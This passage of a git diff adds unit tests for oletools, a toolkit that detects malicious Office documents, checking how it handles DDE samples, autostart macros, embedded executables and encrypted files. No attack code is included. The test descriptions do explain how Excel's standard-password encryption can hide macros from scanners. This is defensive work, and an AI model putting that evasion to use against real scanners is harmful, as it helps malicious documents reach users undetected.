+ 'encrypted/encrypted.pptm': CRYPT,
+ 'encrypted/encrypted.xlsb': CRYPT,
+ 'encrypted/encrypted.xls': (True, True, EXCEL, True, False, False,
+ True, False, False, False, 0),
+ 'encrypted/encrypted.ppt': (True, False, 'unknown', True, False,
+ False, False, True, False, False, 0),
+ 'encrypted/encrypted.pptx': CRYPT,
+ 'encrypted/encrypted.xlsm': CRYPT,
+ 'encrypted/encrypted.doc': (True, True, WORD, True, True, False,
+ False, False, False, False, 0),
+ 'msodde/harmless-clean.docm': (False,),
+ 'msodde/dde-in-csv.csv': (False,),
+ 'msodde/dde-test-from-office2013-utf_16le-korean.doc':
+ (True, True, WORD, False, True, False, False, False, False,
+ False, 0),
+ 'msodde/harmless-clean.doc': (True, True, WORD, False, True, False,
+ False, False, False, False, 0),
+ 'msodde/dde-test.docm': (False,),
+ 'msodde/dde-test.xlsb': (False,),
+ 'msodde/dde-test.xlsm': (False,),
+ 'msodde/dde-test.docx': (False,),
+ 'msodde/dde-test.xlsx': (False,),
+ 'msodde/dde-test-from-office2003.doc': (True, True, WORD, False,
+ True, False, False, False,
+ False, False, 0),
+ 'msodde/dde-test-from-office2016.doc': (True, True, WORD, False,
+ True, False, False, False,
+ False, False, 0),
+ 'msodde/harmless-clean.docx': (False,),
+ 'oleform/oleform-PR314.docm': (False,),
+ 'basic/encrypted.docx': CRYPT,
+ 'oleobj/external_link/sample_with_external_link_to_doc.docx': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.xlsb': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.dotm': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.xlsm': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.pptx': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.dotx': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.docm': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.potm': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.xlsx': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.potx': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.ppsm': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.pptm': (False,),
+ 'oleobj/external_link/sample_with_external_link_to_doc.ppsx': (False,),
+ 'encrypted/autostart-encrypt-standardpassword.xlsm':
+ (True, False, 'unknown', True, False, False, False, False, False, False, 0),
+ 'encrypted/autostart-encrypt-standardpassword.xls':
+ (True, True, EXCEL, True, False, True, True, False, False, False, 0),
+ 'encrypted/dde-test-encrypt-standardpassword.xlsx':
+ (True, False, 'unknown', True, False, False, False, False, False, False, 0),
+ 'encrypted/dde-test-encrypt-standardpassword.xlsm':
+ (True, False, 'unknown', True, False, False, False, False, False, False, 0),
+ 'encrypted/autostart-encrypt-standardpassword.xlsb':
+ (True, False, 'unknown', True, False, False, False, False, False, False, 0),
+ 'encrypted/dde-test-encrypt-standardpassword.xls':
+ (True, True, EXCEL, True, False, False, True, False, False, False, 0),
+ 'encrypted/dde-test-encrypt-standardpassword.xlsb':
+ (True, False, 'unknown', True, False, False, False, False, False, False, 0),
+ }
+
+ indicator_names = []
+ for base_dir, _, files in os.walk(DATA_BASE_DIR):
+ for filename in files:
+ full_path = join(base_dir, filename)
+ name = relpath(full_path, DATA_BASE_DIR)
+ values = tuple(indicator.value for indicator in
+ oleid.OleID(full_path).check())
+ if len(indicator_names) < 2: # not initialized with ole yet
+ indicator_names = tuple(indicator.name for indicator in
+ oleid.OleID(full_path).check())
+ suffix = splitext(filename)[1]
+ if suffix in NON_OLE_SUFFIXES:
+ self.assertEqual(values, NON_OLE_VALUES,
+ msg='For non-ole file {} expected {}, '
+ 'not {}'.format(name, NON_OLE_VALUES,
+ values))
+ continue
+ try:
+ self.assertEqual(values, OLE_VALUES[name],
+ msg='Wrong detail values for {}:\n'
+ ' Names {}\n Found {}\n Expect {}'
+ .format(name, indicator_names, values,
+ OLE_VALUES[name]))
+ except KeyError:
+ print('Should add oleid output for {} to {} ({})'
+ .format(name, __name__, values))
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/oleid/test_issue_166.py b/tests/oleid/test_issue_166.py
new file mode 100644
index 00000000..c350c003
--- /dev/null
+++ b/tests/oleid/test_issue_166.py
@@ -0,0 +1,26 @@
+"""
+Test if oleid detects encrypted documents
+"""
+
+import unittest, sys, os
+
+from tests.test_utils import DATA_BASE_DIR
+from os.path import join
+
+from oletools import oleid
+
+class TestEncryptedDocumentDetection(unittest.TestCase):
+ def test_encrypted_document_detection(self):
+ """ Run oleid and check if the document is flagged as encrypted """
+ filename = join(DATA_BASE_DIR, 'basic/encrypted.docx')
+
+ oleid_instance = oleid.OleID(filename)
+ indicators = oleid_instance.check()
+
+ is_encrypted = next(i.value for i in indicators if i.id == 'encrypted')
+
+ self.assertEqual(is_encrypted, True)
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
\ No newline at end of file
diff --git a/tests/oleobj/__init__.py b/tests/oleobj/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/oleobj/test_basic.py b/tests/oleobj/test_basic.py
new file mode 100644
index 00000000..f2c2a8f3
--- /dev/null
+++ b/tests/oleobj/test_basic.py
@@ -0,0 +1,164 @@
+""" Test oleobj basic functionality """
+
+import unittest
+from tempfile import mkdtemp
+from shutil import rmtree
+from os.path import join, isfile
+from hashlib import md5
+from glob import glob
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR, call_and_capture
+from oletools import oleobj
+from oletools.common.io_encoding import ensure_stdout_handles_unicode
+
+
+#: provide some more info to find errors
+DEBUG = False
+
+
+# test samples in test-data/oleobj: filename, embedded file name, embedded md5
+SAMPLES = (
+ ('sample_with_calc_embedded.doc', 'calc.exe',
+ '40e85286357723f326980a3b30f84e4f'),
+ ('sample_with_lnk_file.doc', 'calc.lnk',
+ '6aedb1a876d4ad5236f1fbbbeb7274f3'),
+ ('sample_with_lnk_file.pps', 'calc.lnk',
+ '6aedb1a876d4ad5236f1fbbbeb7274f3'),
+ ('sample_with_lnk_file.ppt', 'calc.lnk',
+ '6aedb1a876d4ad5236f1fbbbeb7274f3'),
+ ('embedded-unicode.doc', '_nic_de-___________.txt',
+ '264397735b6f09039ba0adf0dc9fb942'),
+ ('embedded-unicode-2007.docx', '_nic_de-___________.txt',
+ '264397735b6f09039ba0adf0dc9fb942'),
+)
+SAMPLES += tuple(
+ ('embedded-simple-2007.' + extn, 'simple-text-file.txt',
+ 'bd5c063a5a43f67b3c50dc7b0f1195af')
+ for extn in ('doc', 'dot', 'docx', 'docm', 'dotx', 'dotm')
+)
+SAMPLES += tuple(
+ ('embedded-simple-2007.' + extn, 'simple-text-file.txt',
+ 'ab8c65e4c0fc51739aa66ca5888265b4')
+ for extn in ('xls', 'xlsx', 'xlsb', 'xlsm', 'xla', 'xlam', 'xlt', 'xltm',
+ 'xltx', 'ppt', 'pptx', 'pptm', 'pps', 'ppsx', 'ppsm', 'pot',
+ 'potx', 'potm', 'ods', 'odp')
+)
+SAMPLES += (('embedded-simple-2007.odt', 'simple-text-file.txt',
+ 'bd5c063a5a43f67b3c50dc7b0f1195af'), )
+
+
+def calc_md5(filename):
+ """ calc md5sum of given file in temp_dir """
+ chunk_size = 4096
+ hasher = md5()
+ with open(filename, 'rb') as handle:
+ buf = handle.read(chunk_size)
+ while buf:
+ hasher.update(buf)
+ buf = handle.read(chunk_size)
+ return hasher.hexdigest()
+
+
+def preread_file(args):
+ """helper for TestOleObj.test_non_streamed: preread + call process_file"""
+    ensure_stdout_handles_unicode() # usually, main() calls this
+ ignore_arg, output_dir, filename = args
+ if ignore_arg != '-d':
+ raise ValueError('ignore_arg not as expected!')
+ with open(filename, 'rb') as file_handle:
+ data = file_handle.read()
+ err_stream, err_dumping, did_dump = \
+ oleobj.process_file(filename, data, output_dir=output_dir)
+ if did_dump and not err_stream and not err_dumping:
+ return oleobj.RETURN_DID_DUMP
+ else:
+ return oleobj.RETURN_NO_DUMP # just anything else
+
+
+class TestOleObj(unittest.TestCase):
+    """ Tests oleobj basic features """
+
+ def setUp(self):
+ """ fixture start: create temp dir """
+ self.temp_dir = mkdtemp(prefix='oletools-oleobj-')
+ self.did_fail = False
+
+ def tearDown(self):
+ """ fixture end: remove temp dir """
+ if self.did_fail and DEBUG:
+ print('leaving temp dir {0} for inspection'.format(self.temp_dir))
+ elif self.temp_dir:
+ rmtree(self.temp_dir)
+
+ def test_md5(self):
+ """ test all files in oleobj test dir """
+ self.do_test_md5(['-d', self.temp_dir])
+
+ def test_md5_args(self):
+ """
+ test that oleobj can be called with -i and -v
+
+        This is how ripOLE was often called (e.g. by amavisd-new);
+ ensure oleobj is a compatible replacement.
+ """
+ self.do_test_md5(['-d', self.temp_dir, '-v', '-i'])
+
+ def test_no_output(self):
+ """ test that oleobj does not find data where it should not """
+ args = ['-d', self.temp_dir]
+ for sample_name in ('sample_with_lnk_to_calc.doc',
+ 'embedded-simple-2007.xml',
+ 'embedded-simple-2007-as2003.xml'):
+ full_name = join(DATA_BASE_DIR, 'oleobj', sample_name)
+ output, ret_val = call_and_capture('oleobj', args + [full_name, ],
+ accept_nonzero_exit=True)
+            if glob(join(self.temp_dir, 'ole-object-*')):
+ self.fail('found embedded data in {0}. Output:\n{1}'
+ .format(sample_name, output))
+ self.assertEqual(ret_val, oleobj.RETURN_NO_DUMP,
+ msg='Wrong return value {} for {}. Output:\n{}'
+ .format(ret_val, sample_name, output))
+
+ def do_test_md5(self, args, test_fun=None, only_run_every=1):
+ """ helper for test_md5 and test_md5_args """
+ data_dir = join(DATA_BASE_DIR, 'oleobj')
+
+ # name of sample, extension of embedded file, md5 hash of embedded file
+ for sample_index, (sample_name, embedded_name, expect_hash) \
+ in enumerate(SAMPLES):
+ if sample_index % only_run_every != 0:
+ continue
+ args_with_path = args + [join(data_dir, sample_name), ]
+ if test_fun is None:
+ output, ret_val = call_and_capture('oleobj', args_with_path,
+ accept_nonzero_exit=True)
+ else:
+ ret_val = test_fun(args_with_path)
+ output = '[output: see above]'
+ self.assertEqual(ret_val, oleobj.RETURN_DID_DUMP,
+ msg='Wrong return value {} for {}. Output:\n{}'
+ .format(ret_val, sample_name, output))
+ expect_name = join(self.temp_dir,
+ sample_name + '_' + embedded_name)
+ if not isfile(expect_name):
+ self.did_fail = True
+ self.fail('{0} not created from {1}. Output:\n{2}'
+ .format(expect_name, sample_name, output))
+ continue
+ md5_hash = calc_md5(expect_name)
+ if md5_hash != expect_hash:
+ self.did_fail = True
+ self.fail('Wrong md5 {0} of {1} from {2}. Output:\n{3}'
+ .format(md5_hash, expect_name, sample_name, output))
+ continue
+
+ def test_non_streamed(self):
+ """ Ensure old oleobj behaviour still works: pre-read whole file """
+ return self.do_test_md5(['-d', self.temp_dir], test_fun=preread_file,
+ only_run_every=4)
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/oleobj/test_external_links.py b/tests/oleobj/test_external_links.py
new file mode 100644
index 00000000..2b7fc5bf
--- /dev/null
+++ b/tests/oleobj/test_external_links.py
@@ -0,0 +1,34 @@
+""" Test that oleobj detects external links in relationships files.
+"""
+
+import unittest
+import os
+from os import path
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR, call_and_capture
+from oletools import oleobj
+
+BASE_DIR = path.join(DATA_BASE_DIR, 'oleobj', 'external_link')
+
+
+class TestExternalLinks(unittest.TestCase):
+ def test_external_links(self):
+ """
+ loop through sample files asserting that external links are found
+ """
+
+ for dirpath, _, filenames in os.walk(BASE_DIR):
+ for filename in filenames:
+ file_path = path.join(dirpath, filename)
+
+ output, ret_val = call_and_capture('oleobj', [file_path, ],
+ accept_nonzero_exit=True)
+ self.assertEqual(ret_val, oleobj.RETURN_DID_DUMP,
+ msg='Wrong return value {} for {}. Output:\n{}'
+ .format(ret_val, filename, output))
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/olevba/__init__.py b/tests/olevba/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/olevba/test_basic.py b/tests/olevba/test_basic.py
new file mode 100644
index 00000000..ef5ed268
--- /dev/null
+++ b/tests/olevba/test_basic.py
@@ -0,0 +1,109 @@
+"""
+Test basic functionality of olevba[3]
+"""
+
+import unittest
+import os
+from os.path import join
+import re
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR, call_and_capture
+
+
+class TestOlevbaBasic(unittest.TestCase):
+ """Tests olevba basic functionality"""
+
+ def test_text_behaviour(self):
+        """Test behaviour of olevba when presented with a pure text file."""
+ self.do_test_behaviour('text')
+
+ def test_empty_behaviour(self):
+        """Test behaviour of olevba when presented with an empty file."""
+ self.do_test_behaviour('empty')
+
+ def do_test_behaviour(self, filename):
+ """Helper for test_{text,empty}_behaviour."""
+ input_file = join(DATA_BASE_DIR, 'basic', filename)
+ output, _ = call_and_capture('olevba', args=(input_file, ))
+
+ # check output
+ self.assertTrue(re.search(r'^Type:\s+Text\s*$', output, re.MULTILINE),
+ msg='"Type: Text" not found in output:\n' + output)
+ self.assertTrue(re.search(r'^No suspicious .+ found.$', output,
+ re.MULTILINE),
+                        msg='"No suspicious...found" not found in output:\n' + \
+ output)
+ self.assertNotIn('error', output.lower())
+
+ # check warnings
+ for line in output.splitlines():
+ if line.startswith('WARNING ') and 'encrypted' in line:
+ continue # encryption warnings are ok
+ elif 'warn' in line.lower():
+                self.fail('Found "warn" in output line: "{}"'
+                          .format(line.rstrip()))
+ # TODO: I disabled this test because we do not log "not encrypted" as warning anymore
+ # to avoid other issues.
+ # If we really want to test this, then the test should be run with log level INFO:
+ # self.assertIn('not encrypted', output)
+
+ def test_rtf_behaviour(self):
+ """Test behaviour of olevba when presented with an rtf file."""
+ input_file = join(DATA_BASE_DIR, 'msodde', 'RTF-Spec-1.7.rtf')
+ output, ret_code = call_and_capture('olevba', args=(input_file, ),
+ accept_nonzero_exit=True)
+
+ # check that return code is olevba.RETURN_OPEN_ERROR
+ self.assertEqual(ret_code, 5)
+
+ # check output:
+ self.assertIn('FileOpenError', output)
+ self.assertIn('is RTF', output)
+ self.assertIn('rtfobj', output)
+ # TODO: I disabled this test because we do not log "not encrypted" as warning anymore
+ # to avoid other issues.
+ # If we really want to test this, then the test should be run with log level INFO:
+ # self.assertIn('not encrypted', output)
+
+ # check warnings
+ for line in output.splitlines():
+ if line.startswith('WARNING ') and 'encrypted' in line:
+ continue # encryption warnings are ok
+ elif 'warn' in line.lower():
+                self.fail('Found "warn" in output line: "{}"'
+                          .format(line.rstrip()))
+
+ def test_crypt_return(self):
+ """
+ Tests that encrypted files give a certain return code.
+
+ Currently, only the encryption applied by Office 2010 (CryptoApi RC4
+ Encryption) is tested.
+ """
+ CRYPT_DIR = join(DATA_BASE_DIR, 'encrypted')
+ CRYPT_RETURN_CODE = 9
+ ADD_ARGS = [], ['-d', ], ['-a', ], ['-j', ], ['-t', ]
+ EXCEPTIONS = ['autostart-encrypt-standardpassword.xls', # These ...
+ 'autostart-encrypt-standardpassword.xlsm', # files ...
+ 'autostart-encrypt-standardpassword.xlsb', # are ...
+ 'dde-test-encrypt-standardpassword.xls', # automati...
+ 'dde-test-encrypt-standardpassword.xlsx', # ...cally...
+ 'dde-test-encrypt-standardpassword.xlsm', # decrypted.
+ 'dde-test-encrypt-standardpassword.xlsb']
+ for filename in os.listdir(CRYPT_DIR):
+ if filename in EXCEPTIONS:
+ continue
+ full_name = join(CRYPT_DIR, filename)
+ for args in ADD_ARGS:
+ _, ret_code = call_and_capture('olevba',
+ args=[full_name, ] + args,
+ accept_nonzero_exit=True)
+ self.assertEqual(ret_code, CRYPT_RETURN_CODE,
+ msg='Wrong return code {} for args {}'\
+ .format(ret_code, args + [filename, ]))
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/olevba/test_crypto.py b/tests/olevba/test_crypto.py
new file mode 100644
index 00000000..aad78df3
--- /dev/null
+++ b/tests/olevba/test_crypto.py
@@ -0,0 +1,66 @@
+"""Check decryption of files from olevba works."""
+
+import sys
+import unittest
+from os.path import basename, join as pjoin
+import json
+from collections import OrderedDict
+
+from tests.test_utils import DATA_BASE_DIR, call_and_capture
+
+from oletools import crypto
+
+
+@unittest.skipIf(not crypto.check_msoffcrypto(),
+ 'Module msoffcrypto not installed for {}'
+ .format(basename(sys.executable)))
+class OlevbaCryptoWriteProtectTest(unittest.TestCase):
+ """
+ Test documents that are 'write-protected' through encryption.
+
+ Excel has a way to 'write-protect' documents by encrypting them with a
+ hard-coded standard password. When looking at the file-structure you see
+ an OLE-file with streams `EncryptedPackage`, `StrongEncryptionSpace`, and
+    `EncryptionInfo`. The first of these contains the actual file. When opening
+    such a file in Excel, it is decrypted without the user noticing.
+
+ Olevba should detect such encryption, try to decrypt with the standard
+ password and look for VBA code in the decrypted file.
+
+    All these tests are skipped if the module `msoffcrypto-tool` is not
+ installed.
+ """
+ def test_autostart(self):
+ """Check that autostart macro is found in xls[mb] sample file."""
+ for suffix in 'xlsm', 'xlsb':
+ example_file = pjoin(
+ DATA_BASE_DIR, 'encrypted',
+ 'autostart-encrypt-standardpassword.' + suffix)
+ output, _ = call_and_capture('olevba', args=('-j', example_file),
+ exclude_stderr=True)
+ data = json.loads(output, object_pairs_hook=OrderedDict)
+ # debug: json.dump(data, sys.stdout, indent=4)
+ self.assertEqual(len(data), 4)
+ self.assertIn('script_name', data[0])
+ self.assertIn('version', data[0])
+ self.assertEqual(data[0]['type'], 'MetaInformation')
+ self.assertIn('return_code', data[-1])
+ self.assertEqual(data[-1]['type'], 'MetaInformation')
+ self.assertEqual(data[1]['container'], None)
+ self.assertEqual(data[1]['file'], example_file)
+ self.assertEqual(data[1]['analysis'], None)
+ self.assertEqual(data[1]['macros'], [])
+ self.assertEqual(data[1]['type'], 'OLE')
+ self.assertEqual(data[2]['container'], example_file)
+ self.assertNotEqual(data[2]['file'], example_file)
+ self.assertEqual(data[2]['type'], "OpenXML")
+ analysis = data[2]['analysis']
+ self.assertEqual(analysis[0]['type'], 'AutoExec')
+ self.assertEqual(analysis[0]['keyword'], 'Auto_Open')
+ macros = data[2]['macros']
+ self.assertEqual(macros[0]['vba_filename'], 'Modul1.bas')
+ self.assertIn('Sub Auto_Open()', macros[0]['code'])
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/ooxml/__init__.py b/tests/ooxml/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/ooxml/test_basic.py b/tests/ooxml/test_basic.py
new file mode 100644
index 00000000..e4f57607
--- /dev/null
+++ b/tests/ooxml/test_basic.py
@@ -0,0 +1,154 @@
+""" Basic tests for ooxml.py """
+
+import unittest
+
+import os
+from os.path import join, splitext
+from tests.test_utils import DATA_BASE_DIR
+from olefile import isOleFile
+from oletools import ooxml
+import logging
+
+
+class TestOOXML(unittest.TestCase):
+ """ Tests correct behaviour of XML parser """
+
+ DO_DEBUG = False
+
+ def setUp(self):
+ if self.DO_DEBUG:
+ logging.basicConfig(level=logging.DEBUG)
+
+
+ def test_rough_doctype(self):
+        """Check all samples, expecting either OLE files or good ooxml output"""
+ # map from extension to expected doctype
+ ext2doc = dict(
+ docx=ooxml.DOCTYPE_WORD, docm=ooxml.DOCTYPE_WORD,
+ dotx=ooxml.DOCTYPE_WORD, dotm=ooxml.DOCTYPE_WORD,
+ xml=(ooxml.DOCTYPE_EXCEL_XML, ooxml.DOCTYPE_WORD_XML),
+ xlsx=ooxml.DOCTYPE_EXCEL, xlsm=ooxml.DOCTYPE_EXCEL,
+ xlsb=ooxml.DOCTYPE_EXCEL, xlam=ooxml.DOCTYPE_EXCEL,
+ xltx=ooxml.DOCTYPE_EXCEL, xltm=ooxml.DOCTYPE_EXCEL,
+ pptx=ooxml.DOCTYPE_POWERPOINT, pptm=ooxml.DOCTYPE_POWERPOINT,
+ ppsx=ooxml.DOCTYPE_POWERPOINT, ppsm=ooxml.DOCTYPE_POWERPOINT,
+ potx=ooxml.DOCTYPE_POWERPOINT, potm=ooxml.DOCTYPE_POWERPOINT,
+ ods=ooxml.DOCTYPE_NONE, odt=ooxml.DOCTYPE_NONE,
+ odp=ooxml.DOCTYPE_NONE,
+ )
+
+ # files that are neither OLE nor xml:
+ except_files = 'empty', 'text'
+ except_extns = 'rtf', 'csv', 'zip'
+
+ # analyse all files in data dir
+ for base_dir, _, files in os.walk(DATA_BASE_DIR):
+ for filename in files:
+ if filename in except_files:
+ if self.DO_DEBUG:
+ print('skip file: ' + filename)
+ continue
+ extn = splitext(filename)[1]
+ if extn:
+ extn = extn[1:] # remove the dot
+ if extn in except_extns:
+ if self.DO_DEBUG:
+ print('skip extn: ' + filename)
+ continue
+
+ full_name = join(base_dir, filename)
+ if isOleFile(full_name):
+ if self.DO_DEBUG:
+ print('skip ole: ' + filename)
+ continue
+ acceptable = ext2doc[extn]
+ if not isinstance(acceptable, tuple):
+ acceptable = (acceptable, )
+ try:
+ doctype = ooxml.get_type(full_name)
+ except Exception:
+ self.fail('Failed to get doctype of {0}'.format(filename))
+ self.assertTrue(doctype in acceptable,
+ msg='Doctype "{0}" for {1} not acceptable'
+ .format(doctype, full_name))
+ if self.DO_DEBUG:
+ print('ok: {0} --> {1}'.format(filename, doctype))
+
+ def test_iter_all(self):
+ """ test iter_xml without args """
+ expect_subfiles = dict([
+ ('[Content_Types].xml', 11),
+ ('_rels/.rels', 4),
+ ('word/_rels/document.xml.rels', 6),
+ ('word/document.xml', 102),
+ ('word/theme/theme1.xml', 227),
+ ('word/settings.xml', 40),
+ ('word/fontTable.xml', 25),
+ ('word/webSettings.xml', 3),
+ ('docProps/app.xml', 26),
+ ('docProps/core.xml', 10),
+ ('word/styles.xml', 441),
+ ])
+ n_elems = 0
+ testfile = join(DATA_BASE_DIR, 'msodde', 'harmless-clean.docx')
+ for subfile, elem, depth in ooxml.XmlParser(testfile).iter_xml():
+ n_elems += 1
+ if depth > 0:
+ continue
+
+ # now depth == 0; should occur once at end of every subfile
+ if subfile not in expect_subfiles:
+ self.fail('Subfile {0} not expected'.format(subfile))
+ self.assertEqual(n_elems, expect_subfiles[subfile],
+ 'wrong number of elems ({0}) yielded from {1}'
+ .format(n_elems, subfile))
+ _ = expect_subfiles.pop(subfile)
+ n_elems = 0
+
+ self.assertEqual(len(expect_subfiles), 0,
+ 'Forgot to iterate through subfile(s) {0}'
+ .format(expect_subfiles.keys()))
+
+ def test_iter_subfiles(self):
+        """ test that limitation to a few subfiles works """
+ testfile = join(DATA_BASE_DIR, 'msodde', 'dde-test.xlsx')
+ subfiles = ['xl/theme/theme1.xml', 'docProps/app.xml']
+ parser = ooxml.XmlParser(testfile)
+ for subfile, elem, depth in parser.iter_xml(subfiles):
+ if self.DO_DEBUG:
+ print(u'{0} {1}{2}'.format(subfile, ' '*depth,
+ ooxml.debug_str(elem)))
+ if subfile not in subfiles:
+ self.fail('should have been skipped: {0}'.format(subfile))
+ if depth == 0:
+ subfiles.remove(subfile)
+
+ self.assertEqual(subfiles, [], 'missed subfile(s) {0}'
+ .format(subfiles))
+
+ def test_iter_tags(self):
+ """ test that limitation to tags works """
+ testfile = join(DATA_BASE_DIR, 'msodde', 'harmless-clean.docm')
+ nmspc = 'http://schemas.openxmlformats.org/wordprocessingml/2006/main'
+ tag = '{' + nmspc + '}p'
+
+ parser = ooxml.XmlParser(testfile)
+ n_found = 0
+ for subfile, elem, depth in parser.iter_xml(tags=tag):
+ n_found += 1
+ self.assertEqual(elem.tag, tag)
+
+ # also check that children are present
+ n_children = 0
+ for child in elem:
+ n_children += 1
+ self.assertFalse(child.tag == '')
+ self.assertTrue(n_children > 0, 'no children for elem {0}'
+ .format(ooxml.debug_str(elem)))
+
+ self.assertEqual(n_found, 7)
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/ooxml/test_zip_sub_file.py b/tests/ooxml/test_zip_sub_file.py
new file mode 100644
index 00000000..6e6085b2
--- /dev/null
+++ b/tests/ooxml/test_zip_sub_file.py
@@ -0,0 +1,167 @@
+""" Test ZipSubFile
+
+Checks that ZipSubFile behaves just like a regular file-like object, except
+that a few operations are not allowed.
+"""
+
+import unittest
+from tempfile import mkstemp, TemporaryFile
+import os
+from zipfile import ZipFile
+
+from oletools.ooxml import ZipSubFile
+
+
+# flag to get more output to facilitate search for errors
+DEBUG = False
+
+# name of a temporary .zip file on the system
+ZIP_TEMP_FILE = ''
+
+# name of a file inside the temporary zip file
+FILE_NAME = 'test.txt'
+
+# contents of that file
+FILE_CONTENTS = b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
+
+
+def setUpModule():
+ """ Called once before the first test; creates a temp zip file """
+ global ZIP_TEMP_FILE
+ handle, ZIP_TEMP_FILE = mkstemp(suffix='.zip',
+ prefix='oletools-test-ZipSubFile-')
+ os.close(handle)
+
+ with ZipFile(ZIP_TEMP_FILE, 'w') as writer:
+ writer.writestr(FILE_NAME, FILE_CONTENTS)
+ if DEBUG:
+ print('Created zip file ' + ZIP_TEMP_FILE)
+
+
+def tearDownModule():
+ """ Called once after last test; removes the temp zip file """
+ if ZIP_TEMP_FILE and os.path.isfile(ZIP_TEMP_FILE):
+ if DEBUG:
+ print('leaving temp zip file {0} for inspection'
+ .format(ZIP_TEMP_FILE))
+ else:
+ os.unlink(ZIP_TEMP_FILE)
+ elif DEBUG:
+ print('WARNING: zip temp file apparently not created')
+
+
+class TestZipSubFile(unittest.TestCase):
+ """ Tests ZipSubFile """
+
+ def setUp(self):
+ self.zipper = ZipFile(ZIP_TEMP_FILE)
+ self.subfile = ZipSubFile(self.zipper, FILE_NAME)
+ self.subfile.open()
+
+ # create a file in memory for comparison
+ self.compare = TemporaryFile(prefix='oletools-test-ZipSubFile-',
+ suffix='.bin')
+ self.compare.write(FILE_CONTENTS)
+ self.compare.seek(0) # re-position to start
+
+ self.assertEqual(self.subfile.tell(), 0)
+ self.assertEqual(self.compare.tell(), 0)
+ if DEBUG:
+ print('created comparison file {0!r} in memory'
+ .format(self.compare.name))
+
+ def tearDown(self):
+ self.compare.close()
+ self.subfile.close()
+ self.zipper.close()
+ if DEBUG:
+ print('\nall files closed')
+
+ def test_read(self):
+ """ test reading """
+ # read from start
+ self.assertEqual(self.subfile.read(4), self.compare.read(4))
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # read a bit more
+ self.assertEqual(self.subfile.read(4), self.compare.read(4))
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # create difference
+ self.subfile.read(1)
+ self.assertNotEqual(self.subfile.read(4), self.compare.read(4))
+ self.compare.read(1)
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # read all the rest
+ self.assertEqual(self.subfile.read(), self.compare.read())
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ def test_seek_forward(self):
+ """ test seeking forward """
+ self.subfile.seek(10)
+ self.compare.seek(10)
+ self.assertEqual(self.subfile.read(1), self.compare.read(1))
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # seek 2 forward
+ self.subfile.seek(2, os.SEEK_CUR)
+ self.compare.seek(2, os.SEEK_CUR)
+ self.assertEqual(self.subfile.read(1), self.compare.read(1))
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # seek backward (only implemented case: back to start)
+ self.subfile.seek(-self.subfile.tell(), os.SEEK_CUR)
+ self.compare.seek(-self.compare.tell(), os.SEEK_CUR)
+ self.assertEqual(self.subfile.read(1), self.compare.read(1))
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # seek to end
+ self.subfile.seek(0, os.SEEK_END)
+ self.compare.seek(0, os.SEEK_END)
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # seek back to start
+ self.subfile.seek(0)
+ self.compare.seek(0)
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+ self.assertEqual(self.subfile.tell(), 0)
+
+ def test_check_size(self):
+ """ test usual size check: seek to end, tell, seek to start """
+ # seek to end
+ self.subfile.seek(0, os.SEEK_END)
+ self.assertEqual(self.subfile.tell(), len(FILE_CONTENTS))
+
+ # seek back to start
+ self.subfile.seek(0)
+
+ # read first few bytes
+ self.assertEqual(self.subfile.read(10), FILE_CONTENTS[:10])
+
+ def test_error_read(self):
+        """ test correct behaviour when reading beyond the end (no exception) """
+ self.subfile.seek(0, os.SEEK_END)
+ self.compare.seek(0, os.SEEK_END)
+
+ self.assertEqual(self.compare.read(10), self.subfile.read(10))
+ self.assertEqual(self.compare.tell(), self.subfile.tell())
+
+ self.subfile.seek(0)
+ self.compare.seek(0)
+ self.subfile.seek(len(FILE_CONTENTS) - 1)
+ self.compare.seek(len(FILE_CONTENTS) - 1)
+ self.assertEqual(self.compare.read(10), self.subfile.read(10))
+ self.assertEqual(self.compare.tell(), self.subfile.tell())
+
+ def test_error_seek(self):
+        """ test correct behaviour when seeking beyond the end (no exception) """
+ self.subfile.seek(len(FILE_CONTENTS) + 10)
+ self.compare.seek(len(FILE_CONTENTS) + 10)
+ # subfile.tell() gives len(FILE_CONTENTS),
+ # compare.tell() gives len(FILE_CONTENTS) + 10,
+ #self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/ppt_parser/__init__.py b/tests/ppt_parser/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/ppt_parser/test_basic.py b/tests/ppt_parser/test_basic.py
